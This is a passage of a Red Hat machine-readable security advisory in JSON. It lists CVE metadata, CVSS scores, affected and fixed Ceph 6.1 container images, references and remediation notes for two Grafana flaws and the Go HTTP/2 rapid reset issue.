} ], "notes": [ { "category": "description", "text": "A flaw was found in grafana. This issue may allow a malicious user to craft a request to the API that enables them to send alert messages via the \"API Alert - Test\".", "title": "Vulnerability description" }, { "category": "summary", "text": "grafana: missing access control allows test alerts by underprivileged user", "title": "Vulnerability summary" }, { "category": "other", "text": "OpenShift ServiceMesh (OSSM) has switched to using upstream rhel rpms for grafana, and is no longer maintaining the servicemesh-grafana package. Hence, it is marked as affected/won\u0027tfix.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "known_not_affected": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-2183" }, { "category": "external", "summary": "RHBZ#2210848", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210848" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-2183", "url": "https://www.cve.org/CVERecord?id=CVE-2023-2183" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2183" }, { "category": "external", "summary": "https://grafana.com/security/security-advisories/cve-2023-2183/", "url": "https://grafana.com/security/security-advisories/cve-2023-2183/" } ], "release_date": "2023-06-06T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:55:37+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7741" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "grafana: missing access control allows test alerts by underprivileged user" }, { "acknowledgments": [ { "names": [ "Grafana Security Team" ], "summary": "Acknowledged by upstream." } ], "cve": "CVE-2023-2801", "cwe": { "id": "CWE-820", "name": "Missing Synchronization" }, "discovery_date": "2023-05-29T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2210840" } ], "notes": [ { "category": "description", "text": "A flaw was found in grafana. This issue occurs when sending an API call to the /ds/query or public dashboard query endpoint that has mixed queries, such as having two or more distinct data sources in one API call. As a result, the Grafana instance will crash. Currently, the only feature that uses mixed queries within Grafana is public dashboards, but it is also possible to trigger this issue by calling the API directly.\r\nIf public dashboards are enabled, reproduction requires a public dashboard to be under a heavy load. If public dashboards are disabled, reproduction only occurs when the /ds/query endpoint with a mixed query payload is under a heavy load with a load testing script.", "title": "Vulnerability description" }, { "category": "summary", "text": "grafana: data source proxy race condition", "title": "Vulnerability summary" }, { "category": "other", "text": "- In OpenShift Container Platform (OCP), Red Hat Advanced Cluster Management for Kubernetes (RHACM), and OpenShift ServiceMesh (OSSM) the grafana components are protected by OpenShift OAuth that reduces the impact of this flaw to Moderate.\n- OpenShift ServiceMesh (OSSM) has switched to using upstream rhel rpms for grafana and is no longer maintaining the servicemesh-grafana package. Hence, it is marked as affected/won\u0027tfix.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "known_not_affected": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-2801" }, { "category": "external", "summary": "RHBZ#2210840", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2210840" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-2801", "url": "https://www.cve.org/CVERecord?id=CVE-2023-2801" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-2801", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-2801" }, { "category": "external", "summary": "https://grafana.com/security/security-advisories/cve-2023-2801/", "url": "https://grafana.com/security/security-advisories/cve-2023-2801/" } ], "release_date": "2023-06-06T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:55:37+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2023:7741" }, { "category": "workaround", "details": "Block mixed query requests and patch to disable mixed query concurrent calls", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "grafana: data source proxy race condition" }, { "cve": "CVE-2023-39325", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2023-10-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2243296" } ], "notes": [ { "category": "description", "text": "A flaw was found in handling multiplexed streams in the HTTP/2 protocol. A client can repeatedly make a request for a new multiplex stream and immediately send an RST_STREAM frame to cancel it. This creates extra work for the server setting up and tearing down the streams while not hitting any server-side limit for the maximum number of active streams per connection, resulting in a denial of service due to server resource consumption. Red Hat has rated the severity of this flaw as \u0027Important\u0027 as the US Cybersecurity and Infrastructure Security Agency (CISA) declared this vulnerability an active exploit.\r\n\r\nCVE-2023-39325 was assigned for the `Rapid Reset Attack` in the Go language packages.", "title": "Vulnerability description" }, { "category": "summary", "text": "golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487)", "title": "Vulnerability summary" }, { "category": "other", "text": "This CVE is related to CVE-2023-44487.\n\nThe majority of RHEL utilities are not long-running applications; instead, they are command-line tools. These tools utilize Golang package as build-time dependency, which is why they are classified as having a \"Moderate\" level of impact.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:ba574717bd9890dcf1677c9b56d45a2047bb1f6a72a0bb5b8e38c6f3f2db4884_amd64" ], "known_not_affected": [ "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:49e943d69210eb9f4218272f64cc2b9a100bb52416784c417b241c7dcd0eeb23_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:561fba3667ff302316ecef3dc7a80202ec5b854b347e4cbc5d2d4a2ad4419ed3_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/keepalived-rhel9@sha256:e12cb06f04ac2870d5c387612f4aab65438c4b8044337ab8c55e924dc273ee6b_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:0809ac10fd225656d8fec0002f71c41f7a07d9c5be0c0affd5740cdae43efcf8_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:6c58ed8e6779027d62bca2dab2de0336ee630257dc903c0ff8069ec986395f47_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-rhel9@sha256:f3eb950ff155132b8d113853d05a917a4e949fa80156bbbdda8e61a5a7d18799_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:04e7e7a046da793f667daa0d1eb8dc90ea984dcd1bdefc8a7b96441a6251b280_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:6f6ed4e34b8450b5af74cab6bab790013006269cb997883fc50f5c20c1f5dd8d_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-haproxy-rhel9@sha256:fd567a237640c49c3cb5d392aa995069eb6d7398bffb2fe982f57563b640d630_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:9276234cb0599b75d0adc88c7b1882ff3da6742306a30f26dade3f9bde06ec7e_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:93b546b7d97fd7fdaf9aef486218350817697a6237cbc3ff512eef40ef772a3a_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-promtail-rhel9@sha256:d6233ee14663867808ca616c9327278af99e0439f0781b548be35e6ab5777de2_amd64", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:39e1eb86a6cc6eaa31018a13f86bbb676ec26250d5daf116e3be6d6d194bfe42_ppc64le", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:a47193626427bfe8f686c9f591248d082271c0d20aed96aa268bf7a03b9123d8_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/snmp-notifier-rhel9@sha256:ca759591794df7f94b67bf798d7d27dd6d2b45d49b8ef8511e2bf51f78672d7e_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2023-39325" }, { "category": "external", "summary": "RHBZ#2243296", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2243296" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2023-39325", "url": "https://www.cve.org/CVERecord?id=CVE-2023-39325" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-39325", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39325" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2023-44487", "url": "https://access.redhat.com/security/cve/CVE-2023-44487" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2023-003" }, { "category": "external", "summary": "https://go.dev/issue/63417", "url": "https://go.dev/issue/63417" }, { "category": "external", "summary": "https://pkg.go.dev/vuln/GO-2023-2102", "url": "https://pkg.go.dev/vuln/GO-2023-2102" }, { "category": "external", "summary": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487", "url": "https://www.cisa.gov/news-events/alerts/2023/10/10/http2-rapid-reset-vulnerability-cve-2023-44487" } ], "release_date": "2023-10-10T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2023-12-12T13:55:37+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_ceph_storage/6\n\nFor supported configurations, refer to:\n\nhttps://access.redhat.com/articles/1548993", "product_ids": [ "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:4dc1e2ace5946178fae29c87e2f86467594833e27ddfef8a005273eb9a1bee45_s390x", "9Base-RHCEPH-6.1-Tools:rhceph/rhceph-6-dashboard-rhel9@sha256:72ebf29aa3a85cf49949379958744a699e1f572f79abf75e7cb8094ceecf074e_ppc64le", 